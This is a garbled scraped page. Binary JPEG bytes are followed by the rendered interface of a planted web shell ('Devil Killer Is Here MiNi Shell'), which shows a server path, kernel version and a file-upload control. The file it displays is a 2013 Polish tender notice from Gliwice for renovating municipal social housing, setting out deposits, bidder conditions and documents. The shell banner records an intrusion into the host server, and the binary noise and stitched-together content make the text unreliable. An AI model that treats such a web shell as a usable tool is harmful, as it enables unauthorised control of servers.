JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131223/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131223/534464-N-2013.html

<p class="kh_header"><b>Gliwice: wykonywanie remontów mieszkań socjalnych i docelowych w budynkach gminnych, zarządzanych przez Zarząd Budynków Miejskich 
I Towarzystwo Budownictwa Społecznego Sp. z o.o. w Gliwicach</b><br>
<b>Numer ogłoszenia: 534464 - 2013; data zamieszczenia: 23.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Budynków Miejskich I Towarzystwo Budownictwa Społecznego Sp. z o.o , ul. Dolnych Wałów 11, 44-100 Gliwice, woj. śląskie, tel. 032 3392900, faks 032 3392962.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zbm.gliwice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonywanie remontów mieszkań socjalnych i docelowych w budynkach gminnych, zarządzanych przez Zarząd Budynków Miejskich 
I Towarzystwo Budownictwa Społecznego Sp. z o.o. w Gliwicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zgodnie z numeracją SIWZ:
3.1 Przedmiotem zamówienia jest wykonywanie remontów mieszkań socjalnych i docelowych w budynkach gminnych, zarządzanych przez Zarząd Budynków Miejskich I Towarzystwo Budownictwa Społecznego Sp. z o.o. w Gliwicach.
3.2	Zamawiający wymaga składania ofert częściowych, gdzie część (zadanie) stanowi:
Zadanie częściowe nr:	Opis:
1Temat: 
Część 1:wykonywanie remontu mieszkań socjalnych i docelowych w budynkach gminnych zarządzanych przez Zarząd Budynków Miejskich I Towarzystwo Budownictwa Społecznego Sp. z o.o. w Gliwicach w okresie do 31.12.2014r.
2Temat: 
Część 2:wykonywanie remontu mieszkań socjalnych i docelowych w budynkach gminnych zarządzanych przez Zarząd Budynków Miejskich I Towarzystwo Budownictwa Społecznego Sp. z o.o. w Gliwicach w okresie do 31.12.2014r. 
3Temat: 
Część 3:wykonywanie remontu mieszkań socjalnych i docelowych w budynkach gminnych zarządzanych przez Zarząd Budynków Miejskich I Towarzystwo Budownictwa Społecznego Sp. z o.o. w Gliwicach w okresie do 31.12.2014r.
3.3	Części nie mogą być dzielone przez Wykonawców, oferty niezawierające pełnego zakresu przedmiotu zamówienia określonego w zadaniu częściowym zostaną odrzucone.
3.4	Wykonawca może złożyć ofertę tylko w jednym zadaniu.
3.5	Wspólny Słownik Zamówień: 
45211341-1 [Roboty budowlane w zakresie mieszkań];
45410000-4 [Tynkowanie];
45420000-7 [Roboty w zakresie zakładania stolarki budowlanej oraz roboty ciesielskie];
45430000-0 [Pokrywanie podłóg i ścian];
45440000-3 [Roboty malarskie i szklarskie];
45450000-6 [Roboty budowlane wykończeniowe, pozostałe];
45300000-0 [Roboty instalacyjne w budynkach].
3.6	Przewidywany zakres zamówienia stanowić będą:
-roboty murarsko-tynkarskie, malarskie, posadzkarskie,
-roboty instalacyjne wodno-kanalizacyjne i gazowe,
-roboty instalacyjne: instalacja elektryczna,
-prace stolarskie,
-roboty zduńskie,
-inne, uzgodnione indywidualnie z Zamawiającym.
3.7	Zasady zlecania robót w ramach zawartej umowy:
a)	zlecenie na wykonanie robót powinno być sporządzone przez służby techniczne Zamawiającego na podstawie: protokołu typowania, wytycznych z Zakładu Gospodarki Mieszkaniowej, Urzędu Miasta, karty stanu technicznego lokalu. Zlecenie/zlecenia zostaną wystawione w terminie od 7 do 14 dni roboczych,
b)	wykonanie robót bez zlecenia będzie upoważniało Zamawiającego do odmowy przyjęcia faktury wystawionej przez Wykonawcę na te roboty,
c)	do każdego zlecenia Wykonawca przedstawi ofertę cenową w formie kosztorysu ofertowego do akceptacji, w formie papierowej (2 egzemplarze) i elektronicznej (program do kosztorysowania),
d)	wykonawca dostarczy kosztorys ofertowy w formie podanej w pkt. 3.7.c SIWZ zgodny z zakresem robót określonym w protokole typowania w ciągu 3 dni od daty sporządzenia protokołu,
e)	zakres robót określony przez Zamawiającego nie może być przez Wykonawcę samowolnie zmieniony. Każda zmiana wymaga akceptacji Zamawiającego,
f)	rozliczenie robót po ich zakończeniu i odbiorze przez inspektora - zgodnie z § 5 pkt.3 i pkt.6 umowy,
g)	do faktury za wykonane roboty musi być podłączony protokół odbioru robót, zlecenie, opinia kominiarska, próba szczelności instalacji gazowej, protokół z pomiaru instalacji elektrycznej oraz zatwierdzony kosztorys zamienny z obmiarem robót,
h)	w sprawach spornych Wykonawca przedstawi Zamawiającemu rachunki/ faktury do wglądu (Zamawiający zastrzega sobie możliwość wglądu w wymienione dokumenty  w sytuacji, gdy zostanie stwierdzona rażąca różnica w zastosowanych materiałach względem oferowanych i wycenionych w kosztorysie np. producent, model, etc., Sytuacja dotyczy również rachunków za przyjęcie odpadów na wysypisko,
i)	zamawiający dopuszcza następujące maksymalne wartości netto wybranych urządzeń: bateria umywalkowa lub zlewozmywakowa: 80zł/szt., bateria wannowa: 130zł/szt., kuchnia gazowa 4-palnikowa z piekarnikiem: 750zł/szt., piec gazowy wody przepływowej wieloczerpalny: 750zł/szt., urządzenie sanitarne porcelanowe kompakt: 300zł/szt., wanna blaszana emaliowana: 280zł/szt., zlewozmywak blaszany emaliowany 2-komorowy: 140zł/szt. Wszystkie urządzenia w I gatunku,  
j)	koszt wymiany stolarki okiennej nie może przekroczyć kwoty 450 netto/m2 (materiały + robocizna: demontaż starych okien, montaż nowych okien, parapetów wewnętrznych i zewnętrznych oraz obróbka),
k)	koszt wymiany stolarki drzwiowej wewnętrznej nie może przekroczyć 350,00zł/szt. netto (materiały + robocizna: demontaż starych drzwi, montaż nowych drzwi oraz obróbka),
l)	koszt wymiany stolarki drzwiowej zewnętrznej nie może przekroczyć 1 500,00 zł/szt. netto (materiały + robocizna: demontaż starych drzwi, montaż nowych drzwi i obróbka),
m)	roboty muszą być wykonywane zgodnie ze sztuką budowlaną w oparciu o przepisy Prawa Budowlanego,
n)	Wykonawca zobowiązany jest do przestrzegania przepisów BHP i P.POŻ w zakresie czynności zgodnych z opisem przedmiotu zamówienia i odpowiada za nie przestrzeganie tych przepisów,
o)	zakres robót winien zostać sporządzony przez Wykonawcę po dokonaniu oględzin lokalu.
3.8	Wykonawca we własnym zakresie dostarcza niezbędny sprzęt, narzędzia oraz materiały 
do wykonania usługi.
3.9	Wykonawca odpowiada za spowodowanie zagrożeń i utrudnień, narażając użytkowników budynków i ich posesji na szkody.
3.10	Przed przystąpieniem do prac i w trakcie wykonywania robót Wykonawca zobowiązany jest do:
-zabezpieczenia zaplecza magazynowego i warunków socjalnych swoim pracownikom,
-przeszkolenia pracowników realizujących zadanie pod katem przepisów BHP,
-prowadzenia księgi obmiarów, zgłaszania robót zanikowych i zgłaszania ich odbioru.
3.11	Do obowiązku Wykonawcy należy przeprowadzenie na własny koszt wymaganych odbiorów.
3.12	Składając w ofercie oświadczanie o zgodności z warunkami przetargu Wykonawca zaświadcza, iż podczas realizacji zadania (na podstawie otrzymanego zlecenia) będzie dysponował osobami posiadającymi odpowiednie kwalifikacje zawodowe w zakresie wykonywanych prac oraz osobami  uprawnionymi do pełnienia funkcji kierownika robót. Wykonawca będzie zobowiązany dostarczyć każdorazowo kopię uprawnień właściwego kierownika robót, wraz z aktualnym zaświadczeniem o wpisie na listę członków właściwej izby samorządu zawodowego, potwierdzające prawo do wykonywania samodzielnych funkcji technicznych w budownictwie (Ustawa z dnia 15 grudnia 2000r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów - Dz. U.  z 2001r.,  Nr 5, poz. 42 z późn. zmianami).
3.13	Pozostałe warunki realizacji zamówienia reguluje treść wzoru umowy, który stanowi załącznik do niniejszej specyfikacji. 
3.14	Wykonawca zobowiązany jest do zachowania dyskrecji i tajemnicy odnośnie ewentualnie powierzonych i w toku wykonywania zamówienia pozyskanych informacji dotyczących Zarządu Budynków Miejskich  I TBS Sp. z o.o. w Gliwicach (m.in.: danych osobowych, miejsc lokacji kluczy do mieszkań, ewentualnych zabezpieczeń mienia). Dokumentacja związana z procesem inwestycyjnym jest jawna (oferty, protokoły, umowy) a sposób jej udostępnienia podlega obowiązującym w tym zakresie przepisom.
3.15	Zamawiający nie dopuszcza składania ofert wariantowych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.41-1, 45.41.00.00-4, 45.42.00.00-7, 45.43.00.00-0, 45.44.00.00-3, 45.45.00.00-6, 45.30.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zgodnie z numeracją SIWZ:
9.1	W zadaniu nr 1 oferta musi być zabezpieczona wadium w wysokości: 9 500.00 PLN (słownie: dziewięć tysięcy pięćset  00/100 PLN).
9.2	W zadaniu nr 2 oferta musi być zabezpieczona wadium w wysokości: 9 500.00 PLN (słownie: dziewięć tysięcy pięćset  00/100 PLN).
9.3	W zadaniu nr 3 oferta musi być zabezpieczona wadium w wysokości: 9 500.00 PLN (słownie: dziewięć tysięcy pięćset  00/100 PLN).
9.4	Wadium należy wnieść  w terminie do dnia 2014-01-08 do godz. 09:00.
9.5	Wadium może być wnoszone w jednej lub kilku następujących formach:
a)	pieniądzu - przelewem na rachunek bankowy Zamawiającego: ING Bank - oddział w Gliwicach 20 1050 1285 1000 0022 2649 4546.
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)	gwarancjach bankowych;
d)	gwarancjach ubezpieczeniowych
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
9.6	Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy Prawo Zamówień Publicznych.
9.7	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
9.8	Zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
9.9	Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 ustawy Prawo Zamówień Publicznych, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
9.10	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3 ustawy Prawo Zamówień Publicznych, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust.1 ustawy Prawo Zamówień Publicznych, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
9.11	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a:	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b:	nie wniósł wymaganego zabezpieczenia należytego wyko?nania umowy;
c:	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje innych wymagań oprócz oświadczenia zawartego w Formularzu ofertowym (załącznik nr 1 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony, jeżeli Wykonawca poświadczy należyte wykonanie minimum dwóch oddzielnych zamówień dotyczących remontów lokali mieszkalnych/usługowych/mieszkalno-usługowych, w których wystąpiły łącznie roboty w branżach: ogólnobudowlanej, instalacyjnej (minimum wod- kan., gaz), elektrycznej. Wartość pojedynczego zamówienia winna opiewać na kwotę minimum 50 000,00zł. Wykazane prace mogły być wykonane w ramach odrębnych umów;
Zamawiający dopuszcza inne dokumenty niż wskazane wyżej jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać właściwego poświadczenia.
W przypadku gdy wskazana w wykazie robota była wykonana na rzecz Zamawiającego, Wykonawca nie ma obowiązku przedkładania dowodów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje innych wymagań oprócz oświadczenia zawartego w Formularzu ofertowym (załącznik nr 1 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże iż osoby które będą uczestniczyć w postępowaniu (wpisane do wykazu osób uczestniczących w postępowaniu) będą odpowiednio  pełniły funkcję kierownika robót ogólnobudowlanych (konstrukcyjno-budowlane), kierownika robót instalacyjnych, kierownika robót elektrycznych oraz będą posiadały stosowne uprawnienia budowlane określone przepisami Prawa Budowlanego, a ponadto są członkami właściwej izby samorządu zawodowego, zgodnie z ustawą z dnia 15 grudnia 2000r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. nr 5 z 2001 r., poz. 42).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony, jeżeli Wykonawca przedłoży opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę minimum 300 000,00zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz ofertowy  -  według załączonego druku. Cenę ofertową należy podać                        w jednostkach pieniężnych obowiązujących           w Polsce tj. złotych polskich, z zaokrągleniem do drugiego miejsca po przecinku.
2.Oświadczenie o braku zaległości z tytułu zobowiązań dla Miasta Gliwice - wzór dołączony do SIWZ.
3.Zaparafowany wzór umowy (wszystkie strony) - dołączony do SIWZ.
4.Kserokopie uprawnień i zaświadczeń osób wskazanych w wykazie osób, które będą uczestniczyć w wykonywaniu zamówienia.
5.Oświadczenie o przynależności do grupy kapitałowej, zgodnie z Art.26 ust.2d PZP.
6.Pełnomocnictwa do podpisywania oferty, podpisane przez osoby uprawomocnione, jeśli nie wynika to z innych dokumentów dołączonych do oferty.
7.Informacja o podwykonawcach.	Do wypełnienia druk, stanowiący załącznik do SIWZ (załączany w przypadku wskazania robót wykonywanych przez podwykonawców; brak druku w ofercie wskazuje na realizację zamówienia bez udziału podwykonawców).
8.Dowód wniesienia wadium zgodnie z pkt.9 SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://przetargi.zbm.gliwice.pl/175.zip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Budynków Miejskich I TBS Sp. z o.o. Sekcja Zamówień Publicznych, Dolnych Wałów 11, Ip., pok. 111, 44-100 Gliwice.</p>
